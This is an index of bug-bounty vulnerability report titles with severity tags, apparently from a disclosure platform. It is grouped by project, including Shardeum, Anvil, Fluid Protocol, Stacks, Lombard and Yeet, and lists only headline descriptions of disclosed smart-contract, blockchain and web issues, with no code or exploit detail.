    • #35014 [SC-Low] incorrect rounding in mintdebt function might allow minimal shares dilution
    • #34978 [SC-Low] protocol runs insolvent due to incorrect reliance on depositbalance which doesn t match holder balances
    • #35026 [SC-Low] `repayDebt` in stbtc returns a worng value
    • #34995 [SC-Low] `mintDebt()` and `repayDebt()` should return `assets` and not `shares`
    • #34712 [SC-Medium] Malicious users can block repay debt transactions with no cost
    • #34998 [SC-Insight] Deposited assets in an old dispatcher may be lost when swapping to a new dispatcher
    • #34672 [SC-Low] Protocol runs insolvent due to incorrect reliance on depositBalance which doesn't match holder balances
    • #34999 [SC-Low] The tBTC in the MezoAllocator itself is not considered in the withdrawal function
    • #34748 [SC-Low] Last withdrawer can be prevented from withdrawing their assets
    • #34729 [SC-Low] `releaseDeposit` will likely fail, putting funds in MezoAllocator at risk of being permanently stuck
    • #34851 [SC-Low] Adversary can freeze users' fund in stBTC using donation attack on MezoAllocator
  • Shardeum Core II
    • #36029 [BC-Insight] Node.js crash on counterMap overflow
    • #35696 [BC-Critical] Specifically crafted penalty TX may cause total network shutdown.
    • #35694 [BC-Critical] Consensus can be bypassed by single validator node from transaction execution group
    • #35601 [BC-Critical] Consensus algorithm doesn't deduplicate votes, allowing a malicious validator to completely falsify transactions
    • #35695 [BC-Critical] validateTxnFields check for internal transactions can be bypassed
    • #35531 [BC-Critical] Absence of signature deduplication for receipt in the binary_repair_oos_accounts P2P handler
    • #36024 [BC-Insight] Use of Vulnerable function results in prediction of archivers
    • #35965 [BC-Insight] Unverified data in safety sync
    • #35707 [BC-Critical] Reusing old transaction receipt to rollback account balance
    • #35415 [BC-Insight] [Informational] debugMiddleware query parameters can be partially modified by request submitter or via MITM
    • #35839 [BC-Critical] Slash avoidance: Ineffective controls on unstaking allow unstaking before taking an action that should be slashed
    • #35526 [BC-Critical] An attacker can change the account balance after the transaction has been processed.
    • #35641 [BC-Insight] node p2p remote denial of service
    • #35697 [BC-Insight] [Informational] Code logic contains potential risk of full network shutdown
    • #35710 [BC-Insight] addressToPartition input is unsanitized, allowing to take whole network down
  • Shardeum Ancillaries II
    • #35598 [W&A-Insight] Access to debug endpoints without any protection
    • #35351 [W&A-Insight] Password Length Bypass in Shardeum Authentication System
    • #35537 [W&A-Insight] json rpc server websocket remote crash
    • #35996 [W&A-Insight] malicious explorer can cause denial of service in json rpc server and even cras
    • #35979 [W&A-High] malicious archiver malicious validator can overwrite data on any active archiver
    • #36025 [W&A-Critical] A malicious validator can overwrite the account data of any archive server connected to it.
    • #35452 [W&A-High] Admin Panel Accessed
    • #36005 [W&A-Insight] Reflected URL Manipulation and Phishing Risk
    • #35972 [W&A-Insight] Operator-GUI Weak JWT Token Generation Led To Generate same JWT Tokens Even if The User Has it's Unique "nodeId"
    • #35447 [W&A-High] Zero Click Full Account Takeover
    • #35446 [W&A-Insight] IDOR Able to change other user information
    • #35903 [W&A-High] SQL Injection Allows a Malicious Archiver to Overwrite Receipt/originalTxData Database on Any Active Archiver in the Network
    • #35824 [W&A-Medium] `/set-config` replay attack is possible in production mode after archiver restart
    • #35157 [W&A-Insight] Unauthorized Access to Shardeum Config Store using default credentials
    • #35709 [W&A-Critical] Potential DoS of archiver-server during network restoration via get_account_data_archiver call
    • #35534 [W&A-Insight] json rpc server remote crash
  • Anvil
    • #36303 [SC-Medium] attackers can cause griefing attack to cause stake transactions of timebasedcolla
    • #36501 [SC-Medium] Signature Front-Running Vulnerability in CollateralVault
    • #36268 [SC-Medium] stake with signature can be front-run lead to user's stake failed
    • #36267 [SC-Insight] tokens can be stuck forever in uniswapliquidator because function retrievetokens
    • #36136 [SC-Insight] Fee calculation error in withdraw function of collateralVault contract
    • #36092 [SC-Insight] Collateralizable Contracts May Retain Status Unconditionally
    • #36540 [SC-Insight] users can withdraw funds at incorrect fee rate
    • #36567 [SC-Insight] Anyone can cancel anyone's LOC
    • #36554 [SC-Critical] Time Based Collateral Pool Users can release more than their due share of the pool, drawing from the due share of other users
    • #36552 [SC-Medium] DoS for the user's calling `stake` and `stakeReleasableTokensFrom` function
    • #36532 [SC-Medium] Frontrun to invalidate collateralizable approval signature
    • #36306 [SC-Insight] Incorrect nonce value emitted in `TimeBasedCollateralPool::_resetPool` event
    • #36475 [SC-Medium] Token allowance signature can be front-run
    • #36450 [SC-Low] contract timebasedcollateralpool will be unable to process new user transactions
    • #36346 [SC-Insight] Typehash Discrepancy in CollateralizableTokenAllowanceAdjustment
    • #36340 [SC-Insight] TimeBasedCollateralPool::_resetAccountTokenStateIfApplicable does not adjust tokenEpochExitBalances after redeeming the account's unstake Units
    • #36309 [SC-Low] TimeBasedCollateralPool: After _resetPool gets called (internally) a depositor can break most functionalities of the smart contract
  • Anvil: Letters of Credit
    • #36807 [SC-Critical] attackers can create dynamic loc with any credited amount with very small co...
    • #36931 [SC-Critical] critical creators can modifyloccollateral of dynamic loc to release ....
    • #36910 [SC-Critical] LoC: The creator can withdraw the entire collateral of a Dynamic LoC making it insolvent
    • #36970 [SC-Insight] Missing `_disableInitializer()` implementation
    • #36999 [SC-Insight] Incomplete Adjustment of `globalAmountInDynamicUse` During LOC Liquidation Causes Accumulated Dust and DoS Risk
  • Fluid Protocol
    • #36922 [SC-Insight] the function claim_collateral in borrowOperation have read only attribute while the invoked claim_collateral function have write attribute, this lead to compiler-time error
    • #37056 [SC-Insight] `require_at_least_min_net_debt` did not emit correct error message
    • #37139 [SC-Insight] insight inefficient use of storage reentrancy locks
    • #37192 [SC-Low] Trove that under MCR might be redeemed.
    • #37276 [SC-Medium] Redstone's price feed is used incorrectly.
    • #37202 [SC-Insight] some checks can be removed since its not required(best practice report, not an issue)
    • #37283 [SC-Low] Improper Trove Validation Check Allows Low-Cost Griefing Attack to Block Protocol Redemptions
    • #37343 [SC-Insight] inaccurate check leading to debt miscalculation
    • #37323 [SC-Critical] Permanent dead Lock in internal_redeem_collateral_from_trove
    • #37354 [SC-Low] Single below MCR trove temporarily blocks redemptions
    • #37382 [SC-Insight] Inconsistent Collateral Ratio Checks in Stability Pool Withdrawals Lead to Fund-Locking DoS
    • #37409 [SC-Low] Can not redeem when all `current_cr` less than `MCR`.
    • #37425 [SC-Insight] redeem collateral does not redeem collateral from riskiest trove but wrongly redeem
    • #37452 [SC-Critical] `trove-manager-contract.redeem_collateral_from_trove` can be locked forever
    • #37595 [SC-Insight] `require_caller_is_bo_or_tm_or_sp_or_pm` did not emit correct message
    • #37607 [SC-Low] bricking redeem function
    • #37624 [SC-Critical] lock issue bricks the redeem functionality
    • #37650 [SC-Low] redeem functionality partially failing
    • #37668 [SC-Low] Incorrect Scale Factor value leads to early scale change
    • #37671 [SC-Critical] CRITICAL-02 / The contract could be permanently locked due to not reseting the boolen lock
  • Folks: Liquid Staking
    • #37660 [SC-High] incorrect tracking of `TOTAL_ACTIVE_STAKE` leads to permanent freezing of funds
    • #37661 [SC-High] Incorrect `total_active_stake` reduction causes loss of funds for the users and excessive fees collection over time
    • #37768 [SC-Insight] Missing Event Emission when proposer are added prevents safe retrieval of index for subsequent operations
    • #37775 [SC-High] Accounting Discrepancy in `consensus_v2.py::burn()`can potentially cause underflow and lead to temporary Denial of Service and a deliberate DOS Attack
    • #37791 [SC - Insight] consensus contract distributes algo for proposers that are offline that cause losing of reward
    • #37807 [SC-Insight] Truncation of mint_amount to zero leading to potential stake loss
    • #37852 [SC-High] The accumulation of rewards is being decreased from the active stake which could leave out users unable to redeem xAlgo
    • #37854 [SC-Insight] Missing state validation upon Upgrade
    • #37864 [SC-Insight] Over-charging users on delayed mint
    • #37863 [SC-High] Underflow in burn method prevents all xALGO from being burnt
    • #37867 [SC-Low] Contract upgrade failing due to SHA256 failing because of AVM byte width limits
    • #37889 [SC-High] Underflow in `burn()` function will cause user funds to partially frozen
    • #37903 [SC-High] "Potential Underflow Vulnerability in burn Function for total_active_stake_key"
    • #37893 [SC-Insight] inflation attack in xalgo
    • #37940 [SC-High] freezing of user funds when reward accumulated or added
  • Jito Restaking
    • #36675 [SC-Insight] Missing revoke instruction leads to Old delegate accounts have unlimited number of token allowance
    • #37315 [SC-High] Theft of Unclaimed Yields Due to Improper Reward Distribution in Vault Program
    • #36787 [SC-Insight] The vault program don't support token2022 transfer
    • #36903 [SC-High] The vault reward mechanism can be sandwiched by MEV
    • #37079 [SC-Insight] Withdrawals can be DOSed by reviving tickets in the same burn tx
    • #37311 [SC-High] Attackers can steal rewards by depositing, updating vault balance and withdrawing immediately after a large reward is deposited
    • #37295 [SC-High] Rewards can be stolen by depositing immediately after reward tokens get sent to vault
    • #37314 [SC-High] Vault creators can not withdraw their fees without being recursively charged (vault and program) fees on their own fees which causes permanent loss of funds
  • SwayLend frontend
    • #37822 [W&A-Insight] insight incorrect amounts displayed to foreign users
    • #37196 [W&A-Insight] DOS due to Misleading 'CircularProgressBar' Display Due to Rounding of 'supplyUsed"
  • Celo
    • #37058 [SC-High] Theft of remuneration through claims processing loops.
    • #37010 [SC-High] Rollback of the incorrect state interferes with the progress of the epoch process, prevents the user from receiving rewards, blocks the launch of the associated contract function, etc
    • #37206 [SC-Medium] Overflow due to lack of checks leading to incorrect price calculation
    • #37251 [SC-Critical] Fraudulent padding of governance voting power
    • #37285 [SC-Critical] Incorrect Delegation State After Slashing in LockedGold Contract
    • #37391 [SC-High] Early Reward Accrual Undermines Validator Group Performance Incentives
    • #37443 [SC-Insight] Race Condition in KeyedBroadcaster Implementation
    • #37427 [SC-Critical] Delegation is not updated on slash and unlock
  • Stacks I Attackathon
    • #38516 [BC-High] Signer can censor transactions and halt the network by providing an invalid nonce or too many nonces
    • #37545 [BC-Medium] Deposits with a lock_time of 16 cannot be processed
    • #38003 [BC-Medium] A malicious coordinator calling `Emily::update_deposits` can make the entire Signers network inoperable
    • #37479 [BC-High] A single signer can lock users' funds by not notifying other signers of the executed `sweep` transaction
    • #38398 [BC-High] Malicious Signers can initiate repeated contract calls to cause the multi-sign wallet to lose tx fee
    • #37530 [BC-Insight] Deposits can be completely DoSed due to incorrect transaction construction
    • #38160 [BC-Insight] Governance calling `sbtc-registry.update-protocol-contract` may cause Stacks' events to be ignored by the signer
    • #37500 [BC-Low] Blocklist can be circumvented due to incorrect blocking logic in `request_decider::can_accept_deposit_request`
    • #38690 [BC-Insight] A malicious coordinator can run multiple DKG coordination in parallel and manipulate their order to break the signers network
    • #38270 [BC-Medium] A signer can send a large number of junk `WstsNetMessage::NonceRequest` through P2P to make other signers run out of memory
    • #38223 [BC-Insight] Attackers can disrupt the tag order of gossip messages to bypass signature verification
    • #37470 [BC-Medium] SBTC Signers do not page through pending deposit requests making it trivially easy to block legit deposits by spamming Emily API
    • #38551 [BC-Medium] A signer can request stacks tx nonces in batches in advance and then DoS other signers' sBTC contract calls
    • #38111 [BC-High] Attackers can send a very large event in a Stacks block so that the Signer can never get the Stacks event
    • #38477 [BC-High] A single signer can abort every attempted signing round by providing an invalid packet once the coordinator requests signature shares
    • #38460 [BC-Low] The coordinator can set a higher BTC tx fee than the current network to make users to pay more fees to the BTC miner
    • #37384 [BC-Medium] Attacker can front-run call to emily api with incorrect data, preventing legit user from registering their deposit
    • #38133 [BC-Medium] A rogue Signer can censor any deposit request from being processed and fullfilled on the Stacks blockchain
    • #38053 [BC-High] A single signer can continuously prevent signatures from being finalized, halting network operations
    • #38740 [BC-High] The missing check in Deposits::DepositScriptInputs::parse() permits losing funds by sending them to an invalid principal
    • #38030 [BC-Insight] Coordinator can be crashed by signers on DKG
    • #38028 [BC-Low] There is a Partial Network Degradation Due to DynamoDB GSI Throttling Under High Traffic
    • #38458 [BC-Critical] The coordinator can submit empty BTC transactions to drain BTC tokens in the multi-sign wallet
    • #38671 [BC-Insight] Signer key rotation is not possible due to deadlock between submitting key rotation to Stacks and retrieving it
    • #38392 [BC-High] Signer can steal STX tokens in multi-sign wallet by setting a high stacks tx fee
    • #37861 [BC-Critical] SBTC Signer WSTS implementation allows nonce replays such that a malicious signer can steal all funds
    • #38605 [BC-Low] Lack of fee_rate/last_fees validation in handle_bitcoin_pre_sign_request ebables rogue signer to cause financial loss to depositors
    • #38582 [BC-High] The `BitcoinCoreClient::get_tx_info` does not support coinbase transactions, which may cause sBTC to be attacked by btc miners or sBTC donations to be lost
    • #37814 [BC-High] Signers can crash other signers by sending an invalid `DkgPrivateShares` due to missing check before passing the payload to `SignerStateMachine::process`
    • #37777 [BC-Medium] `Emily.create_deposit` can overwrite any deposit to the Pending state
    • #37811 [BC-High] Missing length check when parsing `SignatureShareRequest` in the signers allows the coordinator to halt other signers, shutting down the network
    • #37718 [BC-High] Key rotations bricks the system due to incorrect `aggregate_key` being used to spend the `peg UTXO` when signing a sweep transaction
  • Lombard
    • #38012 [SC-Insight] Unused Function in CLAdapter Contract
    • #38066 [SC-Medium] `ProxyFactory` is vulnerable to DoS/Address Hijacking
    • #38102 [SC-Insight] Due to incorrect design in `BasculeV2::validateWithdrawal` valid transactions will be reverted, which will make protocol unable to mint tokens
    • #38116 [SC-Insight] Partner vaults don't account for FireBridge fees, forcing LBTC burn to never work
    • #38137 [SC-Low] `RateLimits` library incorrectly reset the consumed amount when the limit is updated
    • #38148 [SC-Insight] Unnecessary Storage Pointer Declaration batchMintWithFee
    • #38154 [SC-Medium] The offchain data provided to the CLAdapter isn’t properly validated and can be from a different CCIP message, resulting in the freezing of funds
    • #38189 [SC-Insight] Attacker can grief calls to `lbtc.mintWithFee()`
    • #38231 [SC-Low] Due to incorrect design in `Consortium::setNextValidatorSet` the validator set could not be set in certain valid scenarios
    • #38225 [SC-Insight] user funds will get stuck if `removeDestination` executes before notarization and withdraw.
    • 38286 [SC-Low] bitcoinutils getdustlimitforoutput calculate wrongly the dust limit for a given bitcoin script public key
    • #38257 [SC-Insight] Freezing of msg.value passed in Bridge.deposit() if adapter is address zero
    • #38341 [SC-Insight] Suboptimal gas usage and ambiguous behavior during fee estimation
    • 38335 [SC-Medium] attacker can exploit partnervault mint small amount to cause lbtc depeg or protocol insolvency
    • #38342 [SC-Medium] Interchanging `offchainTokenData` between two valid messages
    • #38363 [SC-Medium] LBTC cross-chain transfer can be DOSed
    • #38344 [SC-Low] Old validated messages can not pass proof check when new validators are set
    • #38634 [SC-Medium] Insufficient validation on offchainTokenData in TokenPool.releaseOrMint allows CCIP message to be executed with mismatched payload potentially leading to loss of funds in cross-ch...
    • #38370 [SC-Insight] Issue Between Comment and Code in Consortium
    • #38644 [SC-Insight] Q&A
  • Butter
    • #39181 [SC-Insight] Bond Fund will be Lost When Question is Asked Again
    • #39153 [SC-Insight] Unauthorized Token Creation and Minting Vulnerability
    • #39243 [SC-Insight] Misleading Comment in merge Function Regarding Token Transfers to wrapped1155Factory
    • #39271 [SC-Insight] Check `numericAnswer` before external call to check answer is valid or not
    • #39487 [SC-Insight] flatCfmImplementation and conditionalScalarMarketImplementation contracts can be initialized by anyone
    • 39495 [SC-Low] flatcfm cannot be resolved in case answer of questionid are in greater or equal to 2 outcome count and answer 2 outcome count is 0
    • #39528 [SC-Insight] Lack of Validation for Min and Max Values in FlatCFMFactory leads to wrong payouts
    • #39524 [SC-Insight] Incorrect Outcome Formatting in Reality Adapter Leads to Wrong Number of Outcomes
    • #39539 [SC-Insight] Insufficient validation of tokens when created in `PlayCollateralTokenFactory::createCollateralToken`
  • Zano IOP
    • #41027 [BC-Insight] Breaking asset surjection proof assumptions
    • #40530 [W&A-High] JWT Salt Expiration isn't entirely correct in wallet_rpc_server::auth_http_request
    • #40990 [BC-Insight] Security best practices
    • #40970 [BC-Insight] Double spending by using 0-point stealth address and signature elements in CLSAG-GGX proof verification
    • #40794 [W&A-Insight] Unsecured Wallet Voting Configuration Allows Unauthorized Vote Manipulation Despite Password Protection
  • Shardeum Ancillaries III
    • #39360 [W&A-Insight] getRandomActiveNodes may return inconsistent results
    • #39993 [W&A-Low] node-fetch without response limit
    • 39829 [W&A-Critical] dos archiver via data subscription channel due to broken safestringfy
    • #40004 [W&A-Critical] Multiple vulnerabilities in signature verification during receipt processing on the archiver server
    • #39942 [W&A-Medium] Archiver is still vulnerable to replay attack to `/set-config`
    • #39980 [W&A-Critical] Malicious validator can inject its own cycle record into connected archiver
    • #39434 [W&A-Critical] Improper serialization can create an out-of-memory (OOM) issue on the archive server.
    • 39944 [W&A-Insight] incorrect default configuration leading to dead code
    • 39893 [W&A-Critical] malicious validator can modify txid in global transactions
    • #39910 [W&A-Medium] Numerous replay attacks (with arbitrary data) to protected endpoints are possible
    • 39872 [W&A-Critical] bypass receipt signing validation
    • #39814 [W&A-Low] Prevent new validators from joining the network by a DOS of the archiver
    • #39284 [W&A-Medium] Arbitrarily set any archiver config and remotely turning it off
    • #39109 [W&A-Insight] syncStateDataGlobals will not work, effectively DoS'ing nodes
    • #39623 [W&A-Low] Blocking the victim's account address from sending transactions via JSON-RPC
    • 39626 [W&A-Critical] malicious validator can overwrite any cycle data
    • #39820 [W&A-Medium] Blocking all users from interacting with particular contracts/protocols via JSON-RPC server
  • Shardeum Core III
    • #39873 [BC-Critical] Lack of validation of node activation time in `InitRewardTimes` allows to steal rewards
    • #39811 [BC-Critical] inducing large memory allocation via join endpoint
    • #39921 [BC-Critical] accountDeserializer isn't type safe
    • #39913 [BC-Medium] No rate Limiting in resource-intensive endpoint
    • #39885 [BC-Critical] Signature forgery on behalf of network nodes using binary_sign_app_data endpoint
    • #39876 [BC-Critical] Receiving rewards multiple times for the same period
    • #39871 [BC-Critical] Lack of consensus voting in best cycle calculation allows a malicious validator to fake cycle data and crash all nodes
    • #39838 [BC-Critical] Bypass certificate signing validation by double counting signatures due to signature malleability
    • #39813 [BC-Critical] Bypass `SetCertTime` transaction signature check #2
    • #39103 [BC-Insight] Unchecked data size in "getStakeTxBlobFromEVMTx()" can use lots of CPU resources
    • #39791 [BC-Critical] Filling the queue with "setCertTime" stop the network from processing new transactions
    • 39679 [BC-Critical] bypass certificate signing validation by double counting signatures due to ignor
    • #39678 [BC-Critical] Bypass certificate signing validation by double counting signatures due to capitalization
    • #39675 [BC-Critical] Reward Exploitation via Unvalidated Node Status in "initRewardTX"
    • 39164 [BC-Insight] service point exhaustion
    • #39875 [BC-Critical] Lack of validation of node deactivation time in `ClaimRewards` allows to steal rewards
    • 39882 [BC-Insight] data unsubscribe same node replay
    • 39027 [BC-Insight] abusive join request handler node
    • #39149 [BC-High] EIP-2930 transactions with 20k-address overload the nodes and force the network into "safety" mode
    • #39850 [BC-Medium] Bypass TransferFromSecureAccount transaction validations
    • #39507 [BC-Critical] Insufficient validation on ClaimReward transaction allows attacker to claim an inflated reward OR prevent all nodes from being rewarded
    • #39364 [BC-Critical] Trusting heavily on "appData" enables infinite SHM duplication through double-spend exploit
    • 39355 [BC-Critical] tricking legit node to sign their own apoptosis request payload
    • #39812 [BC-Critical] Bypass `SetCertTime` transaction signature check #1
    • #39994 [BC-Critical] Tricking nodes into signing nearly-arbitrary data
    • 40005 [BC-Critical] removal of node out of network via remove by app gossip and signature duplicat
    • #39973 [BC-Critical] Standard node rewarding flow can be blocked
    • #40000 [BC-Critical] Improper input validation in fixDeserializedWrappedEVMAccount leads to DOS and total network shutdown
    • #39511 [BC-Critical] malicious node can drain balance of other node s nominator evm address
    • #39463 [BC-Insight] `multiSendWithHeader` and `sendWithHeader` have JSON injection vulnerability
    • #39395 [BC-Medium] got.get without response limit
    • #39465 [BC-Critical] Lack of authorization on InitClaimReward transaction allows attacker to prevent all nodes from being rewarded
    • #39752 [BC-Insight] There is an issue related to incorrect version parsing and comparison logic lead to incorrect node validation,
    • #39191 [BC-Critical] JoinRoute: Attacker reachable input serialization
    • #40007 [BC-Critical] Drain node staking account due to improper validation of SetCertTime internal transaction
    • #39979 [BC-Critical] Total network shutdown via fixDeserializedWrappedEVMAccount call through binary_repair_oos_accounts endpoint
  • IOP CircuitDAO
    • #43705 sc critical attackers can exploit lack of validation in byc coin issuance pro
    • #44355 sc high announcer owner can inflate announcers registry entries via mutate and register loop
    • #44324 sc medium atom announcer owner can nulify financial penalty
  • Yeet
    • #41215 [SC-Critical] StakeV2: Inconsistencies in totalSupply computation, can lead to protocol insolvency
    • #41487 [SC-Critical] Updates totalSupply before transferring the tokens which causes calculating more reward tokens
    • #41664 [SC-Low] Users may receive fewer rewards due to the change in reward limits
    • 41672 [SC-Insight] permanent loss risk of user funds due to inflexible function design in claim
    • #41492 [SC-Insight] Incorrect Reward Value Emitted in `executeRewardDistributionYeet` Function
    • #41526 [SC-Medium] MoneyBrinter::compound can be vulnerable to sandwich attacks
    • #41289 [SC-Critical] StakeV2 Contract Insolvency Issue
    • #41660 [SC-Insight] Yeet will be permanently DOSED if the entropyProvider runs out of randome numbers or gets blacklisted
    • #41511 [SC-Low] The contract calculates the `minimumYeetPoint` using the Pot going to the winner instead of the whole Pot.
    • #41256 [SC-Insight] Contradictory Documentation and actual function
    • #41291 [SC-Insight] winner selection vulnerability in yeetback contract allows
    • #41949 [SC-Insight] Optimize StakeV2::startUnstake with `unchecked` block to reduce gas costs
    • #42033 [SC-Insight] MoneyBrinter contract does not consider farm's pausing status
    • #42127 [SC-Insight] Redundant Fee Calculation in addYeetback() function
    • #41766 [SC-Insight] In `Yeet.sol`, storage slots only set in constructor should be declared `immutable`.
    • #41272 [SC-Insight] Unnecessary precision loss due to division before multiplication in `getDistribution()`
    • #41707 [SC-Insight] Code differs from documentation in `Reward::getClaimableAmount` function
    • #42388 [SC-Insight] Discrepancy between number of Yeetback winners in contract and documentation
    • #41132 [SC-Insight] NFT Boost Lookup values not adhere to docs
    • #41659 [SC-Insight] Previous owner still hold manager role after ownership transfer
    • #41682 [SC-Insight] Code can be optimized to use save a lot of gas.
    • #42487 [SC-Insight] Redundant Slippage Check in `compound` Function
    • #41765 [SC-Insight] Storage slots only set in constructor should be declared `immutable`
    • #41570 [SC-Insight] Code Insights Report
    • #42351 [SC-Insight] Yeetback complex rewards system
    • #41647 [SC-High] Unused tokens after zapping can be stuck and not entitled to users
    • #41875 [SC-High] Permanent Lock of User Funds in StakeV2 Due to Incorrect token Debt Handling
    • #41907 [SC-High] Unused debt is not send to Reward Claimer
    • #42548 [SC-High] Remaining token0 and token1 sent from Zapper to StakeV2 will be permanently locked in StakeV2 forever.
    • #41419 [SC-Insight] Miscalculation of `maxClaimable` variable leads to users being able to claim too many or too few reward tokens
    • #42189 [SC-High] User rewards incorrectly transferred to `StakeV2` instead of claimant
    • #41644 [SC-High] `_clearUserDebt` in zapOut function sends the remaining tokens to `msg.sender` instead of receiver.
    • #41688 [SC-Insight] Code can be optimized to to save a significant amount of gas.
    • #41374 [SC-Insight] Incorrect NFT Boost Value in Lookup Array
    • #42214 [SC-High] Leftover `WBERA` and `YEET` sent to `StakeV2` instead of to user who is claiming rewards
    • #42718 [SC-High] zapOut methods in zapper contract incorrectly use _msgSender() instead of receiver when sending back remainder tokens
    • #41640 [SC-High] Stuck Rewards in StakeV2 Contract Due to Improper Handling of Leftover Tokens
    • #41639 [SC-Insight] Cross-Vault Reward Arbitrage in StakeV2 Allows Yield Theft
    • #41638 [SC-Medium] Sandwich Attack on `compound()` Function Allows Value Extraction from Honest Depositors
    • #41823 [SC-Low] Changing the reward settings has a retroactive impact
    • #41528 [SC-High] When claiming rewards in native Bera via `StakeV2.claimRewardsInNative`, excess `token0Debt` or/and `token1Debt` is not returned to the kodiak vault but stuck in `StakeV2` contract.
    • #42407 [SC-Low] Updating MAX_CAP_PER_WALLET_PER_EPOCH_FACTOR impacts unclaimed rewards of past epochs
    • #41635 [SC-Low] MoneyBrinter contract is EIP-4626 incompliant
    • #42602 [SC-Medium] Some of the Compounded Reward Island token can be stolen by sandwiching the compound() function call
    • #42345 [SC-Critical] Theft of User Funds in executeRewardDistributionYeet During Vesting Period
    • #42123 [SC-Critical] Insufficient Token Reservation in `startUnstake` Leads to Permanent Freezing of Vested Funds
    • #41974 [SC-Critical] Reducing `totalSupply` in `startUnstake` leads to protocol insolvency
    • #42292 [SC-High] zapper wrong convertion
    • #41456 [SC-Critical] `executeRewardDistributionYeet` will count user withdraws as rewards
    • #42158 [SC-High] Users can DoS `Zapper::zapIn` functionality for a token
    • #41886 [SC-Low] Full or Large WBERA reward collects can be blocked by small amounts
    • #41624 [SC-Medium] Reward sandwich is possible in `MoneyBrinter` vault by frontrunning `compound`.
    • #41270 [SC-Medium] Harvest timing exploit enables theft of unclaimed yield
    • #42553 [SC-Medium] Sandwich attack on `MoneyBrinter_compound` allows extracting rewards intended for LPs
    • #41831 [SC-Critical] Miscalculation of excess rewards via external token transfers leads to contract insolvency and incomplete withdrawals
    • #41524 [SC-Critical] Incorrect Reward Calculation in accumulatedDeptRewardsYeet() Function Leads to Loss of User Funds During Vesting Period
    • #42581 [SC-Critical] Miscalculated Balances Lead to Protocol Insolvency
    • #42710 [SC-Medium] Modulo opation introduces bias during the winning yeet calculation
    • #41559 [SC-Critical] Incorrect Calculation of Accumulated Rewards Due to Unstaked Tokens
    • #42539 [SC-Low] Incorrect `maxWithdraw()` returns lead to user failed withdrawals of returned maximum amount
    • #41911 [SC-Critical] Unstake amount can be zapped before user withdrawal
    • #42538 [SC-Insight] Incorrect value in events emitted in StakeV2
    • #42623 [SC-Critical] Potential Loss of Staked Tokens During Unstaking, Incorrect calculation of excess tokens in`accumulatedDeptRewardsYeet`
    • #41894 [SC-Critical] Incorrect calculation of deposited rewards yeet leads to Staker's not being able to get their staked amount back
    • #42682 [SC-Critical] Loss of funds during the reward distribution in executeRewardDistributionYeet() of StakeV2 contract
    • #42532 [SC-High] Compound function in MoneyBrinter can lead to loss of yield
    • #41633 [SC-High] Users might lose some of the rewards they’re supposed to get.
    • #42604 [SC-Low] `MoneyBrinter` vault does not conform to ERC4626
    • #42518 [SC-Critical] Incorrect handling of total staked funds will lead to protocol insolvency
    • #41542 [SC-Insight] The 20% charged as a `yeetback` is not considered as part of `addYeetVolume` and `boostedValue`
    • #42443 [SC-Critical] Vested `$YEET` are susceptible of being impossible to unstake
    • #42469 [SC-Critical] Incorrect computation of excess rewards leads to permanent freezing of user funds
    • #41488 [SC-Insight] In `StakeV2.sol` there exists a critical flaw that allows adversaries to earn more rewards than should be possible for a period of having staked minimal tokens.
    • #41432 [SC-High] Attacker can DoS `StakeV2`'s rewards distribution by repeatedly inflating Zapper's approval for whitelisted Kodiak Vault tokens
    • #42439 [SC-Insight] report for stakev2 contract
    • #42382 [SC-Critical] Calling `StakeV2::executeRewardDistributionYeet` by manager during an ongoing unstaking period for stakers can result in them being unable to unstake permanently
    • #42333 [SC-Medium] compound MoneyBrinter.sol can be sandwiched to extract value from other depositors
    • #41145 [SC-Insight] Incorrect Inheritance of Ownership in `Manager` Contract Leading to Inconsistent Use of `Ownable2Step`
    • #41345 [SC-Critical] Calculation of accumulatedDeptRewardsYeet is incorrect lead to user lost of fund
    • #41359 [SC-Insight] Remove Manager of Address 0 is irrelevant and will never be reached
    • #42462 [SC-Low] Potential loss of unclaimed rewards due to updating setting `MAX_CAP_PER_WALLET_PER_EPOCH_FACTOR`
    • #41286 [SC-Critical] `accumulatedDeptRewardsYeet()` accounts for tokens under unstaking process
    • #41283 [SC-Low] Contract fails to deliver promised returns, due to changed `MAX_CAP_PER_WALLET_PER_EPOCH_FACTOR`
    • #42008 [SC-Low] Incorrect Application of MAX_CAP_PER_WALLET_PER_EPOCH_FACTOR on Historical Epochs
    • #41377 [SC-Low] Retroactive Reward Cap Manipulation Allows Theft/Loss of Unclaimed Yield
    • #41689 [SC-Insight] Blacklisting a Kodiak vault unintentionally whitelists a previously blacklisted token
    • #42166 [SC-Low] Modification of MAX_CAP_PER_WALLET_PER_EPOCH_FACTOR Leads to Unjust Loss of Promised Rewards for Users
    • #42113 [SC-High] yeetOut function in Zapper.sol sends tokens back to StakeV2 contract instead of user
    • #42152 [SC-Critical] `StakeV2::accumulatedDeptRewardsYeet` fails to account for pending vesting withdrawals which could cause contract insolvency
    • #42637 [SC-Insight] When there is sufficient liquidity for executing reward distribution, token swapping should be skipped to avoid slippage loss
    • #42732 [SC-High] Incomplete token return whena user claim his rewards leads to rewards fund loss
    • #42020 [SC-Critical] Inaccurate calculation in `accumulatedDeptRewardsYeet()` causes double counting of vesting tokens as excess, leading to permanent loss of user funds
    • #42525 [SC-High] Misallocation of leftover token1 in StakeV2.claimRewardsInToken0
    • #41873 [SC-Insight] Protocol fee loss due to incorrect fee calculation in MoneyBrinter.sol
    • #42711 [SC-Insight] Incorrect Index Handling in `unstake` and `rageQuit` Leading to Potential Fund Loss
    • #42039 [SC-High] When calling `StakeV2::claimRewardsInNative()` surplus $YEET are send to the StakeV2 contract instead of the user
    • #42723 [SC-Critical] Unstaked Tokens Included in Excess Reward Calculation Can Cause DoS for Unstaking Users
    • #42355 [SC-Medium] Compounding can be sandwich attacked
    • #41981 [SC-Critical] Loss of user funds during unstaking, while under the lockup period
    • #41952 [SC-Insight] Reduce storage costs by eliminating stakedTimes in StakeV2::startUnstake
    • #41885 [SC-Insight] Bypass token whitelist
    • #42527 [SC-Critical] Critical Balance/Supply Desynchronization Leading to Protocol Insolvency and Loss of User Funds
    • #41938 [SC-Critical] Unstake process manipulation and reward distribution vulnerability
    • #41699 [SC-Insight] Silent Transfer Failures in Native Token Handling
    • #41549 [SC-Critical] users funds can get lost when the executeRewardDistributionYeet function invoked after users unstake
    • #41521 [SC-Critical] Unstaked tokens incorrectly counted as rewards during vesting period
    • #41890 [SC-Insight] MoneyBrinter vault does not consider Farm's staking cap
    • #41365 [SC-Critical] Vested tokens are counted as accumulated revenue
    • #41280 [SC-High] Permanent freezing of yield due to incorrect reward handling in `StakeV2` claim functions
    • #41758 [SC-Insight] The code comment to `BOOSTRAP_PHASE_DURATION` is incorrect
    • #41876 [SC-Insight] User may receive boosted values which are non-concave
